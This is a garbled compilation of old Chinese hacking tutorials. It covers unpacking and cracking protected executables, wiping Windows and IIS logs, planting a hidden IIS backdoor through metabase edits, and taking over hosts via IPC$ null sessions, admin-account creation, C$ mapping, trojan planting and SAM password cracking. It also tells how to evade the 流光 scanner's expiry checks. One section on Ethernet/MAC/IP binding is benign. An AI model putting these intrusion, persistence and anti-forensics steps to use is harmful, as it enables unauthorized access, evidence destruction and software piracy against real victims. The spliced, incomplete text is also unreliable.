首先我想大家应该先明白“壳”的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样,其实都是命名上的方法罢了。
解密(脱壳)技术的进步促进、推动了当时的加密(加壳)技术的发展。LOCK95和BITLOK等所谓的“壳中带籽”加密程序纷纷出笼,真是各出奇谋,把小小的软盘也折腾的够辛苦的了。正在国内的加壳软件和脱壳软件较量得正火红的时候,国外的“壳”类软件早已经发展到像LZEXE之类的压缩壳了。这类软件说穿了其实就是一个标准的加壳软件,它把EXE文件压缩了以后,再在文件上加上一层在软件被执行的时候自动把文件解压缩的“壳”来达到压缩EXE文件的目的。接着,这类软件也越来越多,PKEXE、AINEXE、UCEXE和后来被很多人认识的WWPACK都属于这类软件,但奇怪的是,当时我看不到一个国产的同类软件。
由于WINDOWS3.1只是基于DOS下的一个图形外壳,所以在这个平台下的“壳”类软件很少,见过的就只有像PACKWIN等几个有限的压缩工具,终难成气候。
BW的作者Ding-Boy最新发表了一个WIN95的EXE加壳软件DBPE。虽然它还不太成熟,但它可以为软件加上使用日期限制这个功能是其它加壳软件所没有的,或者以后的加壳软件真的会是像他说的那样可以:加壳和压缩并重、并施;随意加使用日期;加上注册码;加软件狗(磁盘)保护;加硬件序列号判别;加...。
二.加壳软件最常见的加壳软件ASPACK,UPX,PEcompact不常用的加壳软件WWPACK32;PE-PACK;PETITE;NEOLITE
三.侦测壳和软件所用编写语言的软件1.侦测壳的软件fileinfo.exe简称fi.exe(侦测壳的能力极强)使用方法:
第一种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行windows起始菜单的运行,键入fiaa
第二种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上
2.侦测壳和软件所用编写语言的软件language.exe(两个功能合为一体,很棒)推荐language2000中文版,我的
主页可下载傻瓜式软件,运行后选取待侦测壳的软件即可(open)
3.软件常用编写语言Delphi,VisualBasic(VB)---最难破,VisualC(VC)
脱壳
拿到一个软件,我们首先根据第一课的内容。侦测它的壳,然后我们要把它的壳脱去,还原它的本来面目.若它没有加壳,就省事不用脱壳了.
一.脱壳软件unaspack,caspr,upx,unpecompact,procdump二.使用方法(一)aspack壳脱壳可用unaspack或caspr1.unaspack我的主页可下载中文版使用方法类似lanuage傻瓜式软件,运行后选取待脱壳的软件即可.缺点:只能脱aspack早些时候版本的壳,不能脱高版本的壳2.caspr第一种:待脱壳的软件(如aa.exe)和caspr.exe位于同一目录下,执行windows起始菜单的运行,键入caspraa.exe脱壳后的文件为aa.ex_,删掉原来的aa.exe,将aa.ex_改名为aa.exe即可使用方法类似fi优点:可以脱aspack任何版本的壳,脱壳能力极强缺点:Dos界面第二种:将aa.exe的图标拖到caspr.exe的图标上***若已侦测出是aspack壳,用unaspack脱壳出错,说明是aspack高版本的壳,用caspr脱即可
(二)upx壳脱壳可用upx待脱壳的软件(如aa.exe)和upx.exe位于同一目录下,执行windows起始菜单的运行,键入upx-daa.exe
(三)PEcompact壳脱壳用unpecompact使用方法类似lanuage。傻瓜式软件,运行后选取待脱壳的软件即可
(四)procdump万能脱壳但不精,一般不要用我的主页可下载中文版使用方法:运行后,先指定壳的名称,再选定欲脱壳软件,确定即可脱壳后的文件大于原文件。由于脱壳软件很成熟,手动脱壳一般用不到,不作介绍.
三.exe可执行文件编辑软件ultraedit下载它的汉化版本,它的注册机可从网上搜到ultraedit打开一个中文软件,若加壳,许多汉字不能被认出ultraedit打开一个中文软件,若未加壳或已经脱壳,许多汉字能被认出ultraedit可用来检验壳是否脱掉,以后它的用处还很多,请熟练掌握例如,可用它的替换功能替换作者的姓名为你的姓名注意字节必须相等,两个汉字替两个,三个替三个,不足处在ultraedit编辑器左边用00补
五.国外破解站点
6.Freak2freak.cjb.net
1.小榕的elsave清除日志的使用:
先用ipc$管道进行连接:netuse\\ip\ipc$"password"/user:""
清除目标系统的应用程序日志:
elsave-s\\ip-l"application"-C
清除目标系统的系统日志:
elsave-s\\ip-l"system""-C
清除目标系统的安全日志:
elsave-s\\ip-l"security"-C
2.windows2000日志的清除:
www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:netstopw3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.
win2000中的其他一些日志:
安全日志:%winsystem%\system32\config\Secevent.evt
应用程序日志:%winsystem%\system32\config\AppEvent.evt
系统日志:%winsystem%\system32\config\SysEvent.evt
IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志
IIS的www日志:%winsystem%\system32\logfiles\w3svc1\默认每天一个日志
Scheduler服务日志:%winsystem%\schedlgu.txt
注册表所在项目:
[HKLM]\system\CurrentControlSet\Services\Eventlog
Schedluler服务注册表所在项目:
[HKLM]\SOFTWARE\Microsoft\SchedulingAgent
如果日志被从新定位,路径在注册表里面有记录.
清除日志
www和ftp日志必须想停w3svc:netstopw3svc
Scheduler服务日志必须想停止:TaskScheduler服务才能删除日志:netstop"TaskScheduler"
也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:
cleaniislog[logfile][.][cleanIP].
说明:清除的日志文件,.代表所有清除的日志中哪个IP地址的记录,.代表所有IP记录
举例:cleaniislog.127.0.0.1
A.可以清除指定的的IP连接记录,保留其他IP记录。
B.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法:CleanIISLog<.><.>
:指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。
浅谈绑定之应用
目前以太网已经普遍应用于运营领域,如小区接入、校园网等等。但由于以太网本身的开放性、共享性和弱管理性,采用以太网接入在用户管理和安全管理上必然存在诸多隐患。业界厂商都在寻找相应的解决方案以适应市场需求,绑定是目前普遍宣传和被应用的功能,如常见的端口绑定、MAC绑定、IP绑定、动态绑定、静态绑定等。其根本目的是要实现用户的唯一性确定,从而实现对以太网用户的管理。
一、绑定的由来
绑定的英文词是BINDING,其含义是将两个或多个实体强制性的关联在一起。一个大家比较熟悉的例子,就是配置网卡时,将网络协议与网卡驱动绑定在一起。其实在接入认证时,匹配用户名和密码,也是一种绑定,只有用户名存在并且密码匹配成功,才认为是合法用户。在这里,用户名已经可以唯一标识某个用户,与对应密码进行一一绑定。
二、绑定的分类
从绑定的实现机制上,可以分为AAA(服务器)有关绑定和AAA无关绑定;从绑定的时机上,可以分为静态绑定和动态绑定。
AAA无关绑定完全由接入设备实现。接入设备(如Lanswitch)上没有用户信息,所以AAA无关绑定只能以端口为核心,在端口上可以配置本端口可以接入的MAC(或IP)地址列表,只有其MAC地址属于此列表中的计算机才能够从该端口接入网络。
三、绑定的应用模式
除了常用的用户名与密码绑定外,可以用于绑定的属性主要有:端口、VLAN、MAC地址和IP地址。这些属性的特性不同,其绑定的应用模式也有较大差别。
1、IP地址绑定
1)解释
按照前边的定义标准,IP地址绑定可以分为AAA有关IP地址绑定、AAA无关IP地址绑定、IP地址静态绑定和IP地址动态绑定。
AAA有关IP地址绑定:在AAA上保存用户固定分配的IP地址,用户认证时,接入设备上传用户机器静态配置的IP地址,AAA将设备上传IP地址与本地保存IP地址比较,只有相等才允许接入。
AAA无关IP地址绑定:在接入设备上配置某个端口只能允许哪些IP地址接入,一个端口可以对应一个IP地址,也可以对应多个,用户访问网络时,只有源IP地址在允许的范围内,才可以接入。
IP地址静态绑定:接入网络时检查用户的IP地址是否合法。
IP地址动态绑定:用户上网过程中,如更改了自己的IP地址,接入设备能够获取到,并禁止用户继续上网
2)应用
教育网中,学生经常改变自己的IP地址,学校里IP地址冲突的问题比较严重,各学校网络中心承受的压力很大,迫切需要限制学生不能随便更改IP地址。可以采用以下方法做到用户名和IP地址的一一对应,解决IP地址问题。
如有DHCPServer,可以使用IP地址动态绑定,限制用户上网过程中更改IP地址。此时需要接入设备限制用户只能通过DHCP获取IP地址,静态配置的IP地址无效。如没有DHCPServer,可以使用AAA有关IP地址绑定和IP地址动态绑定相结合方式,限制用户只能使用固定IP地址接入,接入后不允许用户再修改IP地址。通过DHCPServer分配IP地址时,一般都可以为某个MAC地址分配固定的IP地址,再与AAA有关MAC地址绑定配合,变相的做到了用户和IP地址的一一对应。
2、MAC地址绑定
与IP地址绑定类似,MAC地址绑定也可以分为AAA有关MAC地址绑定和AAA无关MAC地址绑定;MAC地址静态绑定和MAC地址动态绑定。
由于修改了MAC地址之后,必须重新启动网卡才能有效,重新启动网卡就意味着重新认证,所以MAC地址动态绑定意义不大。
AAA有关MAC地址绑定在政务网或园区网中应用比较多,将用户名与机器网卡的MAC地址绑定起来,限制用户只能在固定的机器上上网,主要是为了安全和防止帐号盗用。但由于MAC地址也是可以修改的,所以这个方法还存在一些漏洞的。
3、端口绑定
设备IP和端口号对最终用户都是不可见的,最终用户也无法修改端口信息,用户更换端口后,一般都需要重新认证,所以端口动态绑定的意义不大。由于AAA无关绑定是以端口为核心了,所以AAA无关端口绑定也没有意义。
有意义的端口绑定主要是AAA有关端口绑定和端口静态绑定。
AAA有关端口绑定主要用于政务网、园区网和运营商网络,从而限制用户只能在特定的端口上接入。
4、VLAN绑定
常用的VLAN绑定是AAA有关VLAN绑定和VLAN静态绑定。
如网络接入采用二层结构,上层是三层交换机,下层是二层交换机,认证点在三层交换机上,这种情况下,仅靠端口绑定只能限制用户所属的三层交换机端口,限制范围太大,无法限制用户所属的二层交换机端口。
使用AAA有关VLAN绑定和VLAN静态绑定就可以解决这个问题。
分别为二层交换机的每个下行端口各自设置不同的VLANID,二层交换机上行端口设置为VLAN透传,就产生了一个三层交换机端口对应多个VLANID的情况,每个VLANID对应一个二层交换机的端口。用户认证时,三层交换机将VLAN信息上传到AAA,AAA与预先设置的信息匹配,根据匹配成功与否决定是否允许用户接入。
此外,用户认证时,可以由AAA将用户所属的VLANID随认证响应报文下发到接入设备,这是另外一个角度的功能。虽然无法限制用户只能通过特定的二层交换机端口上网,但是可以限制用户无论从那个端口接入,使用的都是用一个VLANID。这样做的意义在于,一般的DHCPServer都可以根据VLAN划分地址池,用户无论在哪个位置上网,都会从相同的地址池中分配IP地址。出口路由器上可以根据源IP地址制定相应的访问权限。综合所有这些,变相的实现了在出口路由器上根据用户名制定访问权限的功能。
5、其它说明
标准的802.1x认证,只能控制接入端口的打开和关闭,如某个端口下挂了一个HUB,则只要HUB上有一个用户认证通过,该端口就处于打开状态,此HUB下的其他用户也都可以上网。为了解决这个问题,出现了基于MAC地址的认证,某个用户认证通过后,接入设备就将此用户的MAC地址记录下来,接入设备只允许所记录MAC地址发送的报文通过,其它MAC地址的报文一律拒绝。
为了提高安全性,接入设备除了记录用户的MAC地址外,还记录了用户的IP地址、VLANID等,收到的报文中,只要MAC地址、IP地址和VLANID任何一个与接入设备上保存的信息匹配不上,就不允许此报文通过。有的场合,也将这种方式称为接入设备的“MAC地址+IP地址+VLANID”绑定功能。功能上与前边的AAA无关的动态绑定比较类似,只是用途和目的不同。
四、业界厂商产品对绑定的支持
以上的常用绑定功能业界厂商都普遍支持,一些厂商还进行了更有特色的功能开发,如华为提供的以下增强功能:
1、绑定信息自学习
1)MAC地址自动学习
2)IP地址自动学习
与MAC地址自动学习类似。
2、一对多绑定
1)IP地址一对多绑定
用户可以绑定不只一个IP地址,而是可以绑定一个连续的地址段。这个功能主要应用于校园网中,一个教研室一般都会分配一个连续的地址段,教研室的每个用户都可以自由使用该地址段中的任何一个IP地址。教研室内部的网络结构和IP地址经常变化,将用户和教研室的整个地址段绑定后,可以由各教研室自己分配和管理内部IP地址,既不会因教研室内部IP地址分配问题影响整个校园网的正常运转,又可以大大减少AAA系统管理员的工作量。
2)端口一对多绑定
与IP地址一对多绑定类似,也存在端口一对多绑定的问题。CAMS将端口信息分成以下几个部分:接入设备IP地址-槽号-子槽号-端口号-VLANID,这几个部分按照范围由广到窄的顺序。任何一个部分都可以使用通配符,表示不限制具体数值。比如,端口号部分输入通配符,就表示将用户绑定在某台交换机下的某个槽号的某个子槽号的所有端口上,可以从其中的任何一个端口接入。
永远的后门
IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。
如果你对此有情趣,跟我来...........当IIS启动CGI应用程序时,缺省用CreateProcessAsUserAPI来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnettext方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。1.telnet到服务器
FrontPageWeb:(BOOLEAN)TruePath:(STRING)"c:\inetpub\wwwroot"AccessFlags:(INTEGER)513[/w3svc/1/root/localstart.asp][/w3svc/1/root/_vti_pvt][/w3svc/1/root/_vti_log][/w3svc/1/root/_private][/w3svc/1/root/_vti_txt][/w3svc/1/root/_vti_script][/w3svc/1/root/_vti_cnf][/w3svc/1/root/_vti_bin]不要告诉我你不知道上面的输出是什么!!!!现在我们心里已经有底了,是不是!呵呵管理员要倒霉了
3.mkdirc:\inetpub\wwwroot\dir14.cscript.exemkwebdir.vbs-cMyComputer-w"DefaultWebSite"-v"VirtualDir1","c:\inetpub\wwwroot\dir1"这样就建好了一个虚目录:VirtualDir1你可以用1的命令看一下5.接下来要改变一下VirtualDir1的属性为executecscript.exeadsutil.vbssetw3svc/1/root/VirtualDir1/accesswrite"true"-s:cscript.exeadsutil.vbssetw3svc/1/root/VirtualDir1/accessexecute"true"-s:现在你已经可以upload内容到该目录,并且可以运行。你也可以把cmd.exenet.exe直接拷贝到虚拟目录的磁盘目录中。
6.以下命令通过修改iismetabase来迫使iis以本身的安全环境来创建新的CGIprocess
Cscriptadsutil.vbsset/w3svc/1/root/[yourdirectory]/createprocessasuserfalse
注释:cscriptwindowsscripthost.
adsutil.vbswindowsiisadministrationscript
后面是iismetabasepath
这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
大家不可以用来做非法的攻击,一切后果自负入门者如何获得肉鸡
入门者如何获取肉鸡(跳板)
罗嗦了这么多,现在我们开始吧~。首先我们来对几个扫描器评点一下什么?你不知道扫描器是什么?我晕~~~扫描器就是扫描的嘛,它可以检测出主机的漏洞!常见的有端口扫描器,和cgi漏洞扫描器,还有就是象流光那样的大型扫描器,什么都可以扫。我们先来讲一下扫描器的原理!现在假设你是A,要扫的是B那么,通常建立3次握手的过程是A--------Syn------->BA<-----Syn/Ack------BA-------Ack-------->B这样就建立了连接,扫描就是建立很多这样的,从而达到了解对方开了哪些端口,哪些服务厉害的扫描器还会进一步探测!但是,这种tcp扫描会留下大量的记录,如果B的网管不是注意文明用语那么他就会开始注意你了!!所以我们又会用半开放式扫描(syn)也就是A--------Syn------->BA<-----Syn/Ack------BA------->\\BA-connected--<-----B这样,由于B一直得不到确认,当然就不会记录ip啦,不过B若是很bt,那么他也会记录任何syn的ip,那就没办法了!!
扫描的原理讲完了,现在来讲讲几个扫描的工具!!这才是重点,新手哪会关心
那原理啊~~~我们先来讲端口扫描器一个端口就是一条路,进入系统的的路!可见他的重要!!我推荐用superscan和nscan两个都是国外的,superscan的汉化版有问题,建议去www,peckerland.com下载E文版nscan在黑白有下!这两个的界面简单,我就不罗嗦了!我很喜欢superscan.他的扫描准且快~~对单一端口的大规模扫描也很不错,以前大家就是用它来扫3389的!
加到administrators组ntcmd>netlocalgroupadministratorsaaa/add命令成功完成
好了,这样肉鸡就做好了.什么你想把他作成跳板好的,我们继续来流光4->工具->nt/iis工具->ipc种植者添上ip,用户名,密码等然后点开始接下来我们再用telnet连上去,去debugsnake的sksockserver注意,用ntcmd
不能安装sksockserver。具体我就不说了,大家自己参考说明.
当然,大家也可以放一堆后门上去.不过我喜欢这样ntcmd>netuseg:\\ip\c$命令成功完成
这样,我们就把他的c盘映射成了我的g盘。然后我再放个木马的server上去再用ntcmd运行,呵呵搞定~~,玩他没商量!!!我们还可以把c;\winnt\repair\sam._抓下来,用lc3跑一下就得到所有用户的密码,或是用木马抓密码!!当然我们也可以telnet上去运行tlntadmn来修改telnet端口,更隐蔽怎么扩大战果呢我们仍用ntcmdntcmd>netview......出来很多机器名,这是和我们的肉鸡共享的比如有一台是\\LOVE我们就ntcmd>ping-aLOVE这样就得到了他的ip我一般会用sss再扫一次当然,你也可以用你得到的密码去试试,看能不能进去,呵呵
有一次,我"不小心"跑到某教育部门,netview一下,居然和教育局挂钩....接下来出于自身安全,我就停住了,呵呵,中国的政府不能乱搞的~~~
最后是打扫脚印,建议用小榕的cleaniislog,很方便,用法参见说明!请记住,入侵nt的首选绝对是139,netbios
补充一点,大家在连接时可以用2000自带的计算机管理->连接到计算机这样也很方便.
关于其他几种方法,我在这里说明一下
关于unicode漏洞请参见ncc写的教程
流光是一个很好的攻击工具,他的exploits文件夹和tools文件夹的东西大家漫漫体会,呵呵。不说了,不然天下大乱了!!
流光的使用方法
窍门一:
1.很多人都有使用流光4.71之前版本的经验,不过现在请下载流光5.0内部测试版.地址:
下载后解压安装!解压密码在说明文件里..(强烈建议查看readme文档再安装撒...)
4.(仔细..再仔细)如果你有金山网标或者天网之类的防火墙的话...恭喜你.你就快成功了..小榕设计流光5.0内部测试版的时候会让打开主程序就会自动访问四个IP地址.第一个是61.166.33.214--云南省楚雄市第二个是218.30.12.185--陕西省西安市(可能会变)第三个是61.166.33.214(跟第一个一样)第四个是66.94.230.45--美国(可能会变..这个很"阴险"大概在前面三个IP过后20秒左右它才出现)
防火墙首先禁止前面四个IP连接.(直接点击禁止就可以了)...
四个IP过后随便你扫什么都不会有限制.如果这时防火墙询问你是不是允许流光5.0访问**.**.**.**(ip)当然点击允许啦...要不怎么扫
4.流光5.0增强了SENSOR的扫描属性.很强大...特别是"TELNETip控制端口"和数据包转发功能我佩服得7体投地...自带有说明文件.大家看看就知道了.(我在这里就不废话了撒...呼呼)_________________________________
窍门二:
还有一个比较"失败"的方法.打开补了丁的流光之前首先关闭网络连接,即不要上网.过1分钟以后再打开网络连接...这时你就可以无忧用5.0了..(这样做是防止一开流光5.0就访问指定IP)_________________________________
窍门三:
听"新丁"(我在黑基的兄弟)说更改流光的图标也可以防止过期提示,我没试过.大家试试.._________________________________
TNND...酒气冲头.难受死了...坚持搞完.._________________________________
友情提醒:
1.如果你是天网防火墙请把"属性设置"--"自动允许每个程序运行并记录日志"(好像是这样吧)的勾去掉...这样就可以拦截流光运行时访问的IP地址了..
2.流光5.0由于是内部测试版本,所以不限制国内IP扫描.请千万不要!不要!!不要!!!扫国内IP!尽量多种植SENSOR到你的外国肉鸡上帮你扫撒....(呼呼,我最喜欢做的事)
3.流光5.0太强大.扫描的IP段尽可能少点...这个版本中包含了工具ARPNetwokSniffer,这是一个基于ARPSPOOF的工具,有可能会造成目标网络出现故障甚至于中断,在使用的时候不要指定过于大的IP范围。推荐不要超过32台主机。---引用
不要把自己的机子都搞死了!同时尽量不要使用"网络嗅探"功能."要知道在一个100M的环境中的流量是非常大的,所以请首先确定您自己的主机是否有足够的带宽接收传输数据"---引用!
___________________________________
某些醉话...
1.很多人扫描的时候会扫到用户:root:空admin:同administrator:同wwwadmin:同等同时存在于一个IP的现象.但是建立IPC连接的时候却失败.
注意:这些是虚报...请你点击"选项(o)"---"IPC用户列表选项(I)"----把"如果主机不允许列出用户则强制从以下文件导入"的选项去掉...这样你扫描出来的用户就不会虚报了...
4.流光的综合性很强!注意看每一项选项内容,自己摸索更好的综合扫描办法,....